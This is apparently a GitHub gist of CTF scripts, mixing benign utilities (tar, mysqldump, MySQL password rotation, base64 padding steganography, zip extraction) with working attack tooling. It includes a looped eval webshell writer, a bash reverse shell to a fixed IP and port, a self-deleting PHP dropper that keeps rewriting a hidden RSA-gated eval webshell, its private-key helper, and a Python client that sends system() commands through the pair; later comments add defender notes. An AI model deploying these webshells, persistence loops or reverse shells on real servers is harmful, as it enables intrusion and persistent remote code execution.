@XuCcc
Last active July 23, 2020 08:59
CTF 常用脚本搜集
  • tar -zcvf www.tar.gz directory_to_compress
  • tar -zxvf www.tar.gz
  • pass=123456 whlie true;do echo '<?php if(md5($_GET[pass])=="e10adc3949ba59abbe56e057f20f883e"){@eval($_GET[a]);} ?>' > index.php;sleep 1;done;
  • bash -i >& /dev/tcp/10.173.93.252/9998 0>&1
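def deStego(stegoFile):
    """Recover a message hidden in the padding bits of a base64 text file.

    Every line of *stegoFile* is treated as one base64-encoded line. When a
    line ends in ``=`` the character right before the padding has unused
    low bits (4 bits for ``==``, 2 bits for ``=``); those bits are read
    from every padded line, in file order, and regrouped into 8-bit
    characters. Lines without padding carry nothing and are skipped. This
    is the inverse of ``enStego``.

    Args:
        stegoFile: path of the base64 text to read.

    Returns:
        The hidden message as a ``str``. A trailing group of fewer than 8
        bits is still decoded (kept from the original behaviour).
    """
    b64table = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
    pieces = []
    with open(stegoFile, 'r') as stegoText:
        for line in stegoText:
            # Strip only the terminator: the old ``line[:-1]`` slice ate a real
            # character when the last line of the file had no newline.
            line = line.rstrip("\n")
            try:
                start = line.index("=") - 1
            except ValueError:
                continue  # no padding on this line -> no payload
            if start < 0:
                continue  # '=' with no carrier char before it -> nothing to read
            text = line[start:]
            # Carrier char + padding as a bit string; '=' counts as 0. Characters
            # outside the alphabet map to -1 (unchanged from the original; only
            # the carrier's bits end up in the sliced window anyway).
            chunk = "".join(
                bin(0 if c == '=' else b64table.find(c))[2:].zfill(6) for c in text
            )
            # '==' leaves the carrier's low 4 bits free, '=' its low 2 bits.
            pieces.append(chunk[2 if text.count('=') == 2 else 4:6])
    message = "".join(pieces)
    return "".join(chr(int(message[i:i + 8], 2)) for i in range(0, len(message), 8))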
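def enStego(sourceFile, setgoFile, message):
    """Hide *message* in the base64 padding bits of a text file.

    Each line of *sourceFile* is base64-encoded and written to *setgoFile*.
    When the encoded line ends in ``=`` (2 free bits) or ``==`` (4 free
    bits), the next 2 or 4 message bits are added into the character just
    before the padding. Writing stops as soon as the whole message is
    embedded, so ``deStego`` sees exactly the message bits and nothing
    after them (remaining carrier lines are intentionally not copied).

    Args:
        sourceFile: path of the plain-text carrier to read.
        setgoFile: path of the base64 stego text to write (overwritten).
        message: text to hide; each character is stored as 8 bits.

    Returns:
        Number of message bits that did not fit into the carrier
        (``0`` when everything was embedded).
    """
    import base64  # local import: this snippet does not import it at file level

    b64table = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
    remaining = "".join(bin(ord(ch))[2:].zfill(8) for ch in message)
    with open(sourceFile, 'r') as sourceText, open(setgoFile, 'w') as setgoText:
        for line in sourceText:
            # rstrip instead of ``line[:-1]``: a final line without a newline
            # used to lose its last character before encoding.
            encoded = base64.b64encode(line.rstrip("\n").encode("utf-8")).decode("utf-8")
            pad = encoded.count('=')
            if 0 < 2 * pad <= len(remaining):
                carrier = encoded[-pad - 1]
                # Standard base64 leaves the carrier's low 2*pad bits at zero,
                # so adding the payload value sets exactly those bits.
                replaced = b64table[b64table.index(carrier) + int(remaining[:2 * pad], 2)]
                encoded = encoded[:-pad - 1] + replaced + encoded[-pad:]
                remaining = remaining[2 * pad:]
            setgoText.write(encoded + '\n')
            if not remaining:
                break
    return len(remaining)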
  • backup
    • mysqldump -u{user} -p{pwd} {database} > bak.sql
    • mysqldump -u{user} -p{pwd} --single-transaction --all-databases > bak.sql
    • mysql -u{user} -p{pwd} {database} < bak.sql

Modify Password

  1. 登录 mysql 终端,运行:
mysql> set password=password('new password');
mysql>flush privileges;
  1. 修改 mysql user 表
mysql>use mysql;
mysql>update user set password=password('new password') where user='root';
mysql>flush privileges;
  1. 使用 GRANT 语句
mysql>GRANT ALL PRIVILEGES ON *.* TO 'root'@'127.0.0.1' IDENTIFIED BY 'new password' WITH GRANT OPTION;
mysql>flush privileges;
  1. mysqladmin [root@ubuntu]# mysqladmin -u root password "new password";(注意双引号或不加)

  2. 批量脚本

import subprocess
import uuid


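def change_password(host, user, pwd, port=3306, new_pwd=None):
    """Rotate a MySQL account password with ``mysqladmin`` and report the result.

    Args:
        host: MySQL server host.
        user: account to log in as; its password is the one being changed.
        pwd: the account's current password.
        port: MySQL port (default 3306).
        new_pwd: password to set. When omitted a fresh random hex string is
            generated *per call*. The original default
            ``new_pwd=uuid.uuid4().hex`` was evaluated once at definition
            time, so every host in a batch silently received the same
            password.

    Returns:
        The new password on success, ``None`` on failure.

    Side effects:
        Prints one status line per attempt. As in the original, both the
        old and the new password are echoed to stdout and passed on the
        ``mysqladmin`` command line (readable from the process list), so
        run this where that exposure is acceptable.
    """
    if new_pwd is None:
        new_pwd = uuid.uuid4().hex
    # argv list, no shell: host/user/pwd reach mysqladmin verbatim instead of
    # being interpolated into a shell command string.
    argv = [
        'mysqladmin', f'-h{host}', f'-u{user}', f'-p{pwd}', f'-P{port}',
        'password', new_pwd,
    ]
    try:
        # stdout+stderr merged, like getstatusoutput() did
        proc = subprocess.run(
            argv,
            stdout=subprocess.PIPE,
            stderr=subprocess.STDOUT,
            universal_newlines=True,
            timeout=30,
        )
    except (OSError, subprocess.SubprocessError) as e:
        # The original did ``'...' + e``, which raised TypeError instead of printing.
        print(f'[-] change {user}:{pwd}@{host} fail: {e}')
        return None
    if proc.returncode != 0:
        print(f'[-] {user}:{pwd}@{host} => {new_pwd} fail: ' + proc.stdout.strip())
        return None
    print(f'[+] {user}:{pwd}@{host} => {new_pwd} success')
    return new_pwd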
<?php
// Defender note: this is a self-deleting persistence loop (the "undying
// webshell" pattern). It removes its own file and then re-creates the hidden
// `.index.php` every 5 seconds for as long as this PHP process lives.
// Deleting `.index.php` alone does not remediate it: the writer process must
// be terminated, then the hidden file removed.
set_time_limit(0);     // no execution time limit
ignore_user_abort(1);  // keep running after the HTTP client disconnects
unlink(__FILE__);      // the dropper vanishes from disk; only the loop below remains in memory
$path = '.index.php';  // dot-prefixed target file, hidden from a plain listing
// Body of the dropped shell, written verbatim (no interpolation in single quotes).
$shell = '<?php
class Rsa
{
private static $PUBLIC_KEY = "-----BEGIN PUBLIC KEY-----
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCkZA+AgALF5LWzT7BwP5SlIx05
vwjKi4RAVr1H7nc4RBcGvCSQBLWeDW02yGjryXbSbfCvziJeJzJaNU0LUzhzpa8H
mGE7nrJWT1RuFcv7htHfrB0FGRaRbHtB5Y4MYwbTjV9cRpSEBGORyGGHu4PNN5Ag
jjHclBhGfC9F86Jr/QIDAQAB
-----END PUBLIC KEY-----
";
private static function getPublicKey()
{
$publicKey = self::$PUBLIC_KEY;
return openssl_pkey_get_public($publicKey);
}
public static function publicDecrypt($encrypted = "")
{
if (!is_string($encrypted)) {
return null;
}
return (openssl_public_decrypt(base64_decode($encrypted), $decrypted, self::getPublicKey())) ? $decrypted : null;
}
}
if (isset($_GET["cmd"])) {
$cmd = $_POST["cmd"];
$rsa = new Rsa();
$publicDecrypt = $rsa->publicDecrypt($cmd);
eval($publicDecrypt);
} elseif (isset($_GET[\'input\'])) {
$phpInput = file_get_contents(\'php://input\');
eval($phpInput);
}
';
// Unconditional rewrite every 5 s: the file's mtime keeps changing, which is a
// usable host-side indicator (a dot-file that is rewritten on a fixed cadence).
while (1) {
file_put_contents($path, $shell);
sleep(5);
}
<?php
// Defender note: helper that wraps commands for the paired shell using a
// hard-coded RSA private key stored in a web-reachable file. Anyone who can
// read this file can produce input the shell accepts, so a key pair found on a
// host should be treated as compromised. Because the matching PUBLIC key is
// embedded in the dropped shell, a captured `cmd` blob can be reversed with
// openssl_public_decrypt() during forensics to see what was actually executed.
class Rsa
{
// PEM private key (redacted on this page).
private static $PRIVATE_KEY = '-----BEGIN RSA PRIVATE KEY-----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-----END RSA PRIVATE KEY-----';
// Loads $PRIVATE_KEY with OpenSSL; returns false if the PEM does not parse.
private static function getPrivateKey()
{
$privKey = self::$PRIVATE_KEY;
return openssl_pkey_get_private($privKey);
}
// Private-key "encryption" of $data (effectively a raw signature without a
// hash), base64-encoded; null when $data is not a string or OpenSSL fails.
public static function privEncrypt($data = '')
{
if (!is_string($data)) {
return null;
}
return openssl_private_encrypt($data, $encrypted, self::getPrivateKey()) ? base64_encode($encrypted) : null;
}
}
// Request handling: echoes the wrapped form of the POSTed `cmd` field.
$rsa = new Rsa();
$cmd = $_POST['cmd'];
if ($cmd !== Null) {
$privEncrypt = $rsa->privEncrypt($cmd);
echo $privEncrypt;
}
import requests
import base64
def attack(server, client, cmd):
    """Client side of the RSA-wrapped webshell pair in this gist.

    Posts the raw command to *client* (the PHP helper holding the private
    key) and forwards the returned base64 blob to *server* (the dropped
    shell) in a POST field named ``cmd``; the response body is returned as
    UTF-8 text.

    Defender note: the command text is not visible in transit, only a
    base64 blob in the ``cmd`` field, so host-side indicators (the hidden
    ``.index.php`` and the process that keeps rewriting it) are the
    reliable detection point rather than request-body signatures.
    """
    enpoc = requests.post(client, data={'cmd': f"system('{cmd}');"}).content
    res = requests.post(server, data={'cmd': enpoc})
    res.encoding = 'utf-8'
    return res.text
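def unzip(filename, pwd, path='.'):
    """Extract every member of a (possibly password-protected) zip archive.

    Args:
        filename: path of the archive.
        pwd: archive password as ``str`` (UTF-8 encoded for you) or
            ``bytes``; ``zipfile`` only consults it for encrypted members.
        path: destination directory (default: current directory).
            ``ZipFile.extract`` strips absolute and ``..`` components from
            member names, so entries stay below this directory.

    Returns:
        The name of the last member extracted, or ``None`` for an empty
        archive (the original raised ``NameError`` in that case because the
        loop variable was never bound).

    Raises:
        zipfile.BadZipFile: *filename* is not a zip archive.
        RuntimeError: wrong password for an encrypted member.
    """
    import zipfile  # local import: this snippet does not import it at file level

    key = pwd.encode('utf-8') if isinstance(pwd, str) else pwd
    last = None
    # context manager: the original never closed the archive handle
    with zipfile.ZipFile(filename) as zf:
        for member in zf.namelist():
            zf.extract(member, path, key)
            last = member
    return last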